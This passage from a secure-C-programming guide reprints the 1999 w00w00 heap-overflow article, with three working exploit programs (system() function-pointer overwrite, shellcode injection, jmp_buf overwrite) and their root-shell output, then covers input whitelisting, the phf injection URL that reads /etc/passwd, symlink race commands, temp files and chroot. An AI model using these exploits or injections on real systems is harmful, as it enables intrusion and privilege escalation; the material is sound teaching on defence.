printf("\nHi, I'm a good function. I was passed: %s\n", str);
return 0;
}
----------------------------------------------------------------------
-------

Our first example, is the system() method:


----------------------------------------------------------------------
-------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates overflowing/manipulating static function pointers in
* the bss (uninitialized data) to execute functions.
*
* Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
* To compile use: gcc -o exploit1 exploit1.c
*/

#include
#include
#include
#include

29
#define BUFSIZE 64 /* the estimated diff between funcptr/buf */

#define VULPROG "./vulprog" /* vulnerable program location */


#define CMD "/bin/sh" /* command to execute if successful */

#define ERROR -1

int main(int argc, char **argv)


{
register int i;
u_long sysaddr;
static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
fprintf(stderr, "[offset = estimated system() offset]\n\n");

exit(ERROR);
}

sysaddr = (u_long)&system - atoi(argv[1]);


printf("trying system() at 0x%lx\n", sysaddr);

memset(buf, 'A', BUFSIZE);

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

execl(VULPROG, VULPROG, buf, CMD, NULL);


return 0;
}
----------------------------------------------------------------------
-------

When we run this with an offset of 16 (which may vary) we get:


[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770


after overflow: funcptr points to 0x80484d0
bash#

And our second example, using both argv[] and heap offset method:
----------------------------------------------------------------------
-------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This demonstrates how to exploit a static buffer to point the
* function pointer at argv[] to execute shellcode. This requires

30
* an executable heap to succeed.
*
* The exploit takes two argumenst (the offset and "heap"/"stack").
* For argv[] method, it's an estimated offset to argv[2] from
* the stack top. For the heap offset method, it's an estimated
offset
* to the target/overflow buffer from the heap top.
*
* Try values somewhere between 325-345 for argv[] method, and 420-
450
* for heap.
*
* To compile use: gcc -o exploit2 exploit2.c
*/

#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */

#define VULPROG "./vulprog" /* where the vulprog is */

char shellcode[] = /* just aleph1's old shellcode (linux x86) */


"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
__asm__("movl %esp,%eax"); /* set sp as return value */
}

int main(int argc, char **argv)


{
register int i;
u_long sysaddr;
char buf[BUFSIZE + sizeof(u_long) + 1];

if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}

if (strncmp(argv[2], "stack", 5) == 0)
{
printf("Using stack for shellcode (requires exec. stack)\n");

sysaddr = getesp() + atoi(argv[1]);


printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

memset(buf, 'A', BUFSIZE + sizeof(u_long));


}

31
else
{
printf("Using heap buffer for shellcode "
"(requires exec. heap)\n");

sysaddr = (u_long)sbrk(0) - atoi(argv[1]);


printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

if (BUFSIZE + 4 + 1 < strlen(shellcode))


{
fprintf(stderr, "error: buffer is too small for shellcode "
"(min. = %d bytes)\n", strlen(shellcode));

exit(ERROR);
}

strcpy(buf, shellcode);
memset(buf + strlen(shellcode), 'A',
BUFSIZE - strlen(shellcode) + sizeof(u_long));
}

buf[BUFSIZE + sizeof(u_long)] = '\0';

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

execl(VULPROG, VULPROG, buf, shellcode, NULL);


return 0;
}
----------------------------------------------------------------------
-------

When we run this with an offset of 334 for the argv[] method we get:
[root /w00w00/heap/examples] ./exploit2 334 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffd16 as our argv[1] address

(for 1st exploit) system() = 0x80484d0


(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770


after overflow: funcptr points to 0xbffffd16
bash#

When we run this with an offset of 428-442 for the heap offset method
we get:
[root /w00w00/heap/examples] ./exploit2 428 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x804a9a8 as our buffer's address

(for 1st exploit) system() = 0x80484d0


(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

32
before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#

Note:
Another advantage to the heap method is that you have a large
working range. With argv[] (stack) method, it needed to be exact.
With
the heap offset method, any offset between 428-442 worked.

As you can see, there are several different methods to exploit the
same
problem. As an added bonus, we'll include a final type of
exploitation
that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a
stack
frame, and jump to it at a later point in execution. If we get a
chance
to overflow a buffer between setjmp() and longjmp(), that's above the
overflowed buffer, this can be exploited. We can set these up to
emulate
the behavior of a stack-based overflow (as does the argv[] shellcode
method used earlier, also). Now this is the jmp_buf for an x86
system.
These will needed to be modified for other architectures, accordingly.

First we will include a vulnerable program again:


----------------------------------------------------------------------
-------
/*
* This is just a basic vulnerable program to demonstrate
* how to overwrite/modify jmp_buf's to modify the course of
* execution.
*/

#include
#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 16

static char buf[BUFSIZE];


jmp_buf jmpbuf;

u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)


{
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n");

33
exit(ERROR);
}

printf("[vulprog] argv[2] = %p\n", argv[2]);


printf("[vulprog] sp = 0x%lx\n\n", getesp());

if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */


{
fprintf(stderr, "error: exploit didn't work\n");
exit(ERROR);
}

printf("before:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %p\n\n",


jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

printf("after:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %p\n\n",


jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

longjmp(jmpbuf, 1);
return 0;
}
----------------------------------------------------------------------
-------

The reason we have the vulnerable program output its stack pointer
(esp
on x86) is that it makes "guessing" easier for the novice.

And now the exploit for it (you should be able to follow it):
----------------------------------------------------------------------
-------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
* to emulate a stack-based overflow in the heap. By that I mean,
* you would overflow the sp/pc of the jmpbuf. When longjmp() is
* called, it will execute the next instruction at that address.
* Therefore, we can stick shellcode at this address (as the
data/heap
* section on most systems is executable), and it will be executed.
*
* This takes two arguments (offsets):
* arg 1 - stack offset (should be about 25-45).
* arg 2 - argv offset (should be about 310-330).
*/

34
#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 16

#define VULPROG "./vulprog4"

char shellcode[] = /* just aleph1's old shellcode (linux x86) */


"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)


{
int stackaddr, argvaddr;
register int index, i, j;

char buf[BUFSIZE + 24 + 1];

if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n",
argv[0]);

fprintf(stderr, "[stack offset = offset to stack of


vulprog\n");
fprintf(stderr, "[argv offset = offset to argv[2]]\n");

exit(ERROR);
}

stackaddr = getesp() - atoi(argv[1]);


argvaddr = getesp() + atoi(argv[2]);

printf("trying address 0x%lx for argv[2]\n", argvaddr);


printf("trying address 0x%lx for sp\n\n", stackaddr);

/*
* The second memset() is needed, because otherwise some values
* will be (null) and the longjmp() won't do our shellcode.
*/

memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);


buf[BUFSIZE+24] = '\0';

/* ------------------------------------- */

/*
* We need the stack pointer, because to set pc to our shellcode

35
* address, we have to overwrite the stack pointer for jmpbuf.
* Therefore, we'll rewrite it with the real address again.
*/

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup BP */
{
index = BUFSIZE + 16 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}

/* ----------------------------- */

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup SP */
{
index = BUFSIZE + 20 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}

/* ----------------------------- */

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup PC */
{
index = BUFSIZE + 24 + i;
buf[index] = (argvaddr >> (i * 8)) & 255;
}

execl(VULPROG, VULPROG, buf, shellcode, NULL);


return 0;
}
----------------------------------------------------------------------
-------

Ouch, that was sloppy. But anyway, when we run this with a stack
offset
of 36 and a argv[2] offset of 322, we get the following:
[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp

[vulprog] argv[2] = 0xbffffcf6


[vulprog] sp = 0xbffffb90

before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

bash#

36
w00w00! For those of you that are saying, "Okay. I see this works in
a
controlled environment; but what about in the wild?" There is
sensitive
data on the heap that can be overflowed. Examples include:
functions reason
1. *gets()/*printf(), *scanf() __iob (FILE) structure in heap
2. popen() __iob (FILE) structure in heap
3. *dir() (readdir, seekdir, ...) DIR entries (dir/heap buffers)
4. atexit() static/global function pointers
5. strdup() allocates dynamic data in the
heap
7. getenv() stored data on heap
8. tmpnam() stored data on heap
9. malloc() chain pointers
10. rpc callback functions function pointers
11. windows callback functions func pointers kept on heap
12. signal handler pointers function pointers (note: unix
tracks
in cygnus (gcc for win), these in the kernel, not in the
heap)

Now, you can definitely see some uses these functions. Room allocated
for FILE structures in functions such as printf()'s, fget()'s,
readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function
pointers). atexit() has function pointers that will be called when
the
program terminates. strdup() can store strings (such as filenames or
passwords) on the heap. malloc()'s own chain pointers (inside its
pool)
can be manipulated to access memory it wasn't meant to be. getenv()
stores data on the heap, which would allow us modify something such as
$HOME after it's initially checked. svc/rpc registration functions
(librpc, libnsl, etc.) keep callback functions stored on the heap.

We will demonstrate overwriting Windows callback functions and


overwriting FILE (__iob) structures (with popen).

Once you know how to overwrite FILE sturctures with popen(), you can
quickly figure out how to do it with other functions (i.e., *printf,
*gets, *scanf, etc.), as well as DIR structures (because they are
similar.

Now for some case studies! Our two "real world" vulnerabilities will
be
Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability
was discovered by mudge of L0pht (see L0pht 1996 Advisory Page).
We're
reusing it because it's a textbook example of a heap-based overflow
(though we will use our own method of exploitation).

Our first case study will be the BSDI crontab heap-based overflow. We
can pass a long filename, which will overflow a static buffer. Above
that buffer in memory, we have a pwd (see pwd.h) structure! This
stores

37
a user's user name, password, uid, gid, etc. By overwriting the
uid/gid
field of the pwd, we can modify the privileges that crond will run our
crontab with (as soon as it tries to run our crontab). This script
could
then put out a suid root shell, because our script will be running
with
uid/gid 0.

Here is our exploit code:


----------------------------------------------------------------------
-------
----------------------------------------------------------------------
-------

When we run it on a BSDI X.X machine, we get the following:


[Put exploit output here]

'tip' is run suid uucp on Solaris. It is possible to get root once


uucp
privileges are gained (but, that's outside the scope of this article).
Tip will overflow a static buffer when prompting for a file to
send/receive. Above the static buffer in memory is a jmp_buf. By
overwriting the static buffer and then causing a SIGINT, we can get
shellcode executed (by storing it in argv[]). To exploit
successfully,
we need to either connect to a valid system, or create a "fake device"
with which tip will connect to.

Here is our tip exploit:


----------------------------------------------------------------------
-------
----------------------------------------------------------------------
-------

When we run it on a Solaris 2.7 machine, we get the following:


[Put exploit output here]

Possible Fixes (Workarounds)


~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Obviously, the best prevention for heap-based overflows is writing
good
code! Similar to stack-based overflows, there is no real way of
preventing heap-based overflows.

We can get a copy of the bounds checking gcc/egcs (which should locate
most potential heap-based overflows) developed by Richard Jones and
Paul
Kelly. This program can be downloaded from Richard Jone's homepage
at http://www.annexia.demon.co.uk. It detects overruns that might be
missed by human error. One example they use is: "int array[10]; for
(i =
0; i <= 10; i++) array[i] = 1". I have never used it.

Note:
For Windows, one could use NuMega's bounds checker which essentially
performs the same as the bounds checking gcc.

38
We can always make a non-executable heap patch (as mentioned early,
most
systems have an executable heap). During a conversation I had with
Solar
Designer, he mentioned the main problems with a non-executable would
involve compilers, interpreters, etc.

Note:
I added a note section here to reiterate the point a non-executable
heap does NOT prevent heap overflows at all. It means we can't
execute
instructions in the heap. It does NOT prevent us from overwriting
data
in the heap.

Likewise, another possibility is to make a "HeapGuard", which would be


the equivalent to Cowan's StackGuard mentioned earlier. He (et. al.)
also developed something called "MemGuard", but it's a misnomer.
Its function is to prevent a return address (on the stack) from being
overwritten (via canary values) on the stack. It does nothing to
prevent
overflows in the heap or bss.

Acknowledgements
~~~~~~~~~~~~~~~~
There has been a significant amount of work on heap-based overflows in
the past. We ought to name some other people who have published work
involving heap/bss-based overflows (though, our work wasn't based off
them).

Solar Designer: SuperProbe exploit (function pointers), color_xterm


exploit (struct pointers), WebSite (pointer arrays), etc.

L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab


exploit (mudge), etc.

Some others who have published exploits for heap-based overflows


(thanks
to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and
Adam
Morrison (stdioflow). I'm sure there are many others, and I apologize
for
excluding anyone.

I'd also like to thank the following people who had some direct
involvement in this article: str (stranJer), halflife, and jobe.
Indirect involvements: Solar Designer, mudge, and other w00w00
affiliates.

Other good sources of info include: as/gcc/ld info files


(/usr/info/*),
BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00
(http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:

39
Most people who claim their systems are "secure" are saying so out of
a lack of knowledge (ignorant seemed a little too strong). Assuming
security leads to a false sense of security (e.g., azrael.phrack.com,
has remote vulnerabilities involving heap-based overflows that have
gone
unnoticed for quite a while). Hopefully, people will experiment with
heap-based overflows, and in turn, will become more aware that the
problems exist. We need to realize that the problems are out there,
waiting to be fixed.

Thanks for reading! We hope you've enjoyed it! You can e-mail me at
shok@dataforce.net, or mattc@repsec.com. See the w00w00
(www.w00w00.org)
web site, also!

-----------------------------------------------------------------------
-------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

Validating User Data

In some cases it is necessary to validate user input, and remove characters or data that are
illegitimate. A good example may be reading in a username for authentication. It is
possible to strip out all invalid characters that we know of, such as high-bit characters,
spaces, or numbers. The better way however, is to simply strip out everything except that
which we want to allow. So, instead of guessing which characters may be dangerous and
stripping them out, only allow those that we know are safe. This is usually a common
mistake that is made when passing data to a second program, using a shell command.

One of the most prominent examples of this problem occurred in web based CGI
application known as phf, which shipped with NCSA and Apache web servers by
default. phf was one of the leading causes of internet break-ins a number of years ago.
The phf program stripped out known bad characters, before passing the data to a program
which was called via popen(). As it happens, it missed one character, the new-line (\n)
character, represented as %0a in the HTML query. By using this character in the data
that was passed to the program, an attacker could execute arbitrary commands on the
target host. When parsed by the shell interpreter on the remote host, the new-line
characters acted as a command separator, treating the string before the new-line as one
command, and the string after the new-line as a new command. By asking for the
following URL, it was possible to execute the command “cat /etc/passwd” on the target
host, and view the password file in the web server’s response.

/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a

After this vulnerability was found, a fix was made to a common library function that was
responsible for cleaning the input. The newline character was added to a list of
characters that were removed from the input. This was fine an dandy for a period of
time, until someone found out that bash, (Bourne Again Shell), which is a common unix

40
shell interpreter, also allowed the ASCII character 255 as a command seperator. This
opened up the same attack again, for any operating system that had bash as their default
shell (Linux). If the fix had instead only allowed known good characters, this problem
would never have reoccurred.

Incorrect Correct

#define BAD “/ ;[]<>&\t” #define OK “abcdefghijklmnopqrstuvwxyz\


BCDEFGHIJKLMNOPQRSTUVWXYZ\
1234567890_-.@”;

char *query() char *query()


{ {
char *user_data, *cp; char *user_data, *cp;

/* Get the data */ /* Get the data */

user_data = getenv(“QUERY_STRING”); user_data = getenv(“QUERY_STRING”);

/* Remove bad characters */ /* Remove all but good characters */

for (cp = user_data; *(cp += strcspn(cp, BAD)); ) for (cp = user_data; *(cp += strspn(cp, OK));)
*cp = ‘_’; *cp = ‘_’;

return user_data; return user_data;


} }

In the incorrect example, only known bad characters are removed from the query string.
This leaves in place any unknown dangerous characters. A safer way is to perform this
would be as follows, which removes everything except known good characters.

popen – process I/O


FILE * popen(const char *command, const char *type)
The popen() function “opens” a process by creating a bidirectional pipe forking, and
invoking the shell.

41
getenv
char * getenv(const char *name)
The getenv() function obtains the current value of the environment variable, name. If the
variable name is not in the current environment, a null pointer is returned.

Environment variables, much like command line options, provide a method to provide
arbitrary data to programs. The security concerns of environment variables apply more to
local system programs than network services, since network services do not accept
environment variables in the same fashion (except for a few). Environment variables can
be fashioned in a number of ways to illicit unexpected response from programs.

• Buffer overflow - The same problem that appears in a plethora of other situations,
runs rampant in the handling of environment variables. The following is a typical
example of the type of problems which have been commonly seen in the field:

----begin getenv-example.c----
#include <stdlib.h>
void main() {
char buf[512];
strcpy(buf,getenv(“HOME”));
printf(“Your Home: %s”,buf);
}
----end getenv-example.c----

• In the above function, no consideration is taken as to the size of the “HOME”


environment variable. Regardless of it’s size, it is copied into a 128 byte buffer,
introducing a buffer overflow condition.

An extreme case of this problem was found by Thomas Ptacek in the FreeBSD
operating system. Ptacek found a problem in the C runtime library on FreeBSD.
The C runtime library is statically linked with every program on the system. As a
result, every single setuid/setgid program on the system was vulnerable to a buffer
overflow via the (in addition to every other program as well, but this is
inconsequential).

The following text is quoted from Ptacek’s message to the Bugtraq mailing list in
February of 1997:

“There is a critically important security problem in FreeBSD 2.1.5’s C runtime support library that
will enable anyone with control of the environment of a process to cause it to execute arbitrary
code. All executable SUID programs on the system are vulnerable to this problem.

An immediately exploitable problem is evident in “startup_setrunelocale()”, which, if certain


environment variables are set, will copy the value of “PATH_LOCALE” directly into a 1024 byte
buffer on the routine’s stack. An attacker simply needs to insert machine code and virtual memory
addresses into the “PATH_LOCALE” variable, enable startup locale processing, and run a SUID
program.”

42
• Inheritance - It is important to note that environment variables are commonly
inherited by child processes, that are spawned by the main process (this is
dependant on how the child is spawned however). Therefore, be very careful
when passing environment variables to a child program. You can use the execle()
and execve() system calls to run a program and specify it’s set of environment
variables. To be safe, it is usually a good idea to build an environment from
scratch, and specify only those variables which are required.

Default Permissions (umask)

mode_t umask(mode_t numask)

The umask() routine sets the process’s file mode creation mask to numask and returns the
previous value of the mask. The 9 low-order access permission bits of numask are used
by system calls, including open(2),mkdir(2), and mkfifo(2), to turn off corresponding bits
requested in file mode.
A mode is created from or’d permission bit masks defined in <sys/stat.h>:
#define S_IRWXU 0000700 /* RWX mask for owner */
#define S_IRUSR 0000400 /* R for owner */
#define S_IWUSR 0000200 /* W for owner */
#define S_IXUSR 0000100 /* X for owner */

#define S_IRWXG 0000070 /* RWX mask for group */


#define S_IRGRP 0000040 /* R for group */
#define S_IWGRP 0000020 /* W for group */
#define S_IXGRP 0000010 /* X for group */

#define S_IRWXO 0000007 /* RWX mask for other */


#define S_IROTH 0000004 /* R for other */
#define S_IWOTH 0000002 /* W for other */
#define S_IXOTH 0000001 /* X for other */

#define S_ISUID 0004000 /* set user id on execution */


#define S_ISGID 0002000 /* set group id on execution */
#define S_ISVTX 0001000 /* sticky bit */
#ifndef _POSIX_SOURCE
#define S_ISTXT 0001000
#endif

When a file is created by you, or a program that you are running, it is created with a
default set of file permissions. These permissions are dictated by the setting of the
process’s umask. This is a setting that is inherited from the login shell or parent process
that executed the current process. It is important to ensure that files that are created do
not have unsafe permissions, allowing unauthorized users to access them.

43
The umask setting can be adjusted by utilizing the umask() library call, which takes as a
parameter a set of bits. This set of bits is used to clear the associated bits in the mode of
the created file. Some example usages settings are:

umask(0) results in -rw-rw-rw-

This does not turn off any bits in the permissions of newly created files.

umask(022) results in -rw-r—r--

This turns off the write bits for the group and world portion of the file permission.

umask(066) results in -rw-------

This turns off the read and write bits for the group and world portion of the file
permission.

2.3 Insecure Use of Temporary Files

Many vulnerabilities occur as the result of a program, not necessarily privileged,


accessing a well-known or predictable file on the file system. A program containing this
problem may open a file in the system temporary directory, blindly writing data to the
file. By utilizing symbolic links, an attacker can often redirect this data to other files.
There are 2 scenarios under which this type of attack is commonly launched:

1. A privileged system program is executed by the attacker. The privileged program


executes as the superuser on the system. The program opens up a file in the
system temporary directory:
/tmp/program.temp

By creating a symbolic link prior to execution, an attacker can point this file to other files
that are owned by the privileged user, which the program is executing as.

ln –s /etc/passwd /tmp/program.temp

When the program writes to this file, the symbolic link is followed, and the file written to
is actually /etc/passwd.

2. The attacker expects another user on the system to execute a known non-
privileged program with a temporary file handling issue. Being very patient, the
attacker creates a symbolic link.

44
ln –s /etc/passwd /tmp/program.temp

The attacker then expects another system user to execute the program, appending to the
password file, assuming the user executing the program has this privilege.

The primary difference between these 2 scenarios is that in the first example, the program
being executed is setuid root, and when executed runs as the super-user, while in the
second scenario, the program is only executed with the executing user’s permissions.

There are a number of solutions to these problems:

1. Don’t create temporary files in /tmp.


2. Create temporary files names that are random and not possible to predict.
3. Utilize a system provided interface for creating temporary files (mkstemp()).

There are a number of system provided functions that can be used to provide temporary
files, some of which need to be used correctly to avoid security consequences.

.3.1. tmpfile()

The tmpfile() function creates a temporary file, and returns an open handle to the file
stream. tmpfile() avoids the race condition between the generation of a temporary
filename, and the creation of the file. tmpfile() is defined as follows:

FILE *tmpfile(void);

On many operating systems, tmpfile() will use the mkstemp() function to obtain and
create a temporary filename, then unlink() the file, and fdopen() the file descriptor to
return a stream handle.

Benefits

• A temporary file is safely created and an open stream to the file is returned.
• Avoids the race condition that occurs between the generation of the temporary
filename, and the opening of that file.
• The temporary file is unlinked once it has been created, preventing the file from
being accessed or opened by anyone else in the future – only the stream returned
by tmpfile() has access to the file now.

Restrictions

• The user has no control over where the file is created, although by default it is
usually /var/tmp or /tmp.
• The file is unlinked immediately, so it cannot be opened by another process
(which is usually the purpose of having a temporary file in the first place).

45
• As soon as the file descriptor is closed, the file disappears (since it has been
unlinked). All data is lost.

46
2.3.2. mkstemp()

The mkstemp() function creates a temporary file, given a template, and returns an open
file descriptor to the file. mkstemp() avoids the race condition between the generation of
a temporary filename, and the creation of the file. mkstemp() is defined as follows:

int mkstemp(char *template);


The mkstemp() function makes the same replacement to the template and creates the
template file, mode 0600, returning a file descriptor opened for reading and writing. This
avoids the race between testing for a file’s existence and opening it for use.
An example usage would be:
fd = mkstemp(“/tmp/tempfileXXXXXX”);

When using this function, make sure that you specified at least six trailing X’s. Some
operating systems support more than six X’s to increase the randomness of the filename.

Benefits

• A temporary file is safely created (assuming the system’s implementation is


secure) and an open file descriptor to the file is returned.
• Avoids the race condition that occurs between the generation of the temporary
filename, and the opening of that file.
• Some operating systems use the process ID of the running process to generate the
random filename. This makes the filename predictable, however this function is
still immune to race conditions.

Restrictions

• The file is visible by other system processes and is not unlinked as it is in


tmpfile().
• If the file permissions are not set securely, others can view or modify the contents
of the file.

47
2.3.3. mktemp()

The mktemp() function is used to generate a unique filename, without actually


creating the file. mktemp() is defined as follows:
char *mktemp(char *template);

This function takes a template parameter in the same fashion as the mkstemp() function
above. In the template are a series of X’s, which are filled in by the function with
random values (sometimes) to create the random temporary file name. An example usage
would be:

filename = mktemp(“/tmp/tempfileXXXXXX”);

Benefits

• A temporary file name is obtained (the file is not created)

Restrictions

• On MOST operating systems the file is easily predictable since the randomness
consists only of the process ID. This makes it easy to launch a race condition
attack.
• The filename is guaranteed to be unique only at the time at which the mktemp()
function verifies that the file does not already exist.
• If not used correctly, a race condition can exist between the time the filename is
generated, and the time the file is actually opened by the program.

When using mktemp() it is necessary to open the temporary file once the filename has
been generated. Be careful when opening the file.

open(filename, O_WRONLY | O_CREAT, 0644);

The above call will create the file, succeeding even if the file already exists. This is
dangerous, and can be used to overwrite existing files if a race condition exists.

open(filename, O_WRONLY | O_CREAT | O_EXCL, 0644);

The above is a safer way to create the file, since the call will fail, if the file already exists.

48
2.4 File Race Conditions

There are a large number of different situations in which a race condition can occur,
giving an attacker the ability to subvert access checks or file creations. There is a
common pattern, which when identified, can be alleviated to secure the operation.

1. A permission check or status check is performed utilizing a filename


2. An file operation is performed, performing an operation on the same filename

The problem that arises here is that in between the first and second operations, an attacker
can manipulate the file, causing the permissions or status check to succeed, and the file
operation to reference a different file.

This type of attack commonly utilizes symbolic links to take advantage of a program’s
insecurity. Lets look at an example source code fragment, which could be present in an
insecure setuid root program:

int unsafeopen(char *filename)


{
struct stat st;
int fd;

/* obtain the files status information */

if (stat(filename, &st) != 0)
return -1;

/* make sure that the file is owned by root – uid 0 */

if (st.st_uid != 0)
return -1;

fd = open(filename, O_RDWR, 0);


if (fd < 0)
return -1;

return fd;
}

Essentially the above function does the following:

1. Check to see whether filename exists and make sure it is owned by root (uid 0)
2. Open the file

Since these are 2 separate system calls, there is no atomicity between them, leaving a
time delay between the 2 specific operations. Within this time delay, it is possible for file
and system characteristics to change. An attacker can exploit this in the following
fashion:

49
1. He can create a symbolic link pointing /tmp/filename to a root owned file, for
example /etc/passwd.
2. The stat() call will follow the symbolic link, and return information for
/etc/passwd, which is owned by the root user (uid 0).
3. The attacker removes the symbolic link, and points it to a file he owns.
4. The program now happily opens /tmp/filename, which points to his file for
reading, and reads in his data, instead of the data from a file prepared by another
root owned process.

A safe version of this function would do the following:

int safeopen(char *filename)


{
struct stat st, st2;
int fd;

/* obtain the file’s status information */

if (lstat(filename, &st) != 0)
return -1;

/* make sure the file is a regular file */

if (!S_ISREG(st.st_mode))
return -1;

/* make sure that the file is owned by root – uid 0 */

if (st.st_uid != 0)
return -1;

/* open the file */

fd = open(filename, O_RDWR, 0);


if (fd < 0)
return -1;

/* now we fstat() the file, to make sure it’s the same file still! */

if (fstat(fd, &st2) != 0) {
close(fd);
return -1;

/* here we make sure the inode and device numbers are the
* same in the file we actually opened, compared to the file
* we performed the initial lstat() call on.
*/

if (st.st_ino != st2.st_ino || st.st_dev != st2.st_dev) {


close(fd);
return -1;
}

50
return fd;
}

The above function uses lstat() instead of stat(). This returns the status of the link, if the
specified filename happens to be a symbolic link. It then opens the file, and obtains the
status of the open file descriptor. The inode and device numbers of the status information
are compared (they are unique between files), and if they are not found to be identical,
the function is aborted.

2.5 Implementing a chroot environment

When implementing a network service that exposes an interface to the outside world, an
inherent risk is present. While the developer may have taken all precautions to ensure that
their code is correct and free from the obvious flaws, outside factors such as vulnerable
operating system library calls can introduce unknown vulnerabilities into the service.
UNIX systems possess the ability to limit this exposure by limiting a program’s view of
the operating system. This is achieved by using the chroot system call.

The semantics of this call are as follows:

int chroot(const char *path);

The chroot system call is used by a program to alter it’s view of the current file system.
Note that this only limits file system access, and the process still has access to other parts
of the operating system (system and network calls for example). When used, the path
argument specified to this call will be the new root directory of the filesystem. Once this
has been performed, the process can no longer access files or directories outside of this
new root directory. Only the super-user can execute the chroot system call.

Once you have used the chroot system call, you need to change to the new root directory.
An example usage is given here:

if (chroot(“/jail”) < 0 || chdir(“/”) < 0)


perror(“Failure setting new root directory”);

In many situations, once you have used the chroot call, it is also wise to drop super-user
privileges. This will limit the exposure if a vulnerability does exist in your program. If a
user is able to compromise your program, and break into the limited environment, he has
a much greater chance of breaking out of this environment if he has super-user privileges.

A user with super-user access within the chrooted environment has access to key
operating system functionality which can allow them to break out of the chroot
environment:

51
• The ability to create key operating system devices, such as raw disk and kernel
memory devices, via the mknod() system call. Once created, it is possible to
access the disk and memory directly, making it possible to escape from the
chrooted environment.
• The ability to attach to other system processes that are not running within a
chrooted environment, and affect their operation (by, for example, injecting
malicious code into them). This functionality exists in most operating system via
the ptrace() system interface, which is designed to allow debugging of system
processes (but can be used for malicious intent).
• The ability to send signals to other processes and affect their operation. This is
possible even without super-user privileges if the user has equivalent privileges to
the process they wish to send the signal to.

Some operating systems provide protection from the above scenarios by implementing a
mechanism called securelevels. This mechanism causes the operating system to run at a
higher security level. This can prevent even the super-user from breaking out of the
chroot environment. You should never expect this to be the case however, and should
always expect a worst-case configuration.

It is common for a program to drop privileges and run as the “nobody” user after
performing a chroot (and after peforming all tasks which require super-user privileges).
While some programs do this, it is important to remember that even when running as the
“nobody” user, the process can affect the actions of other processes if they also run as the
“nobody” user. It is suggested that a special account be created for the process to run as,
and that this account not be used for any other purpose.

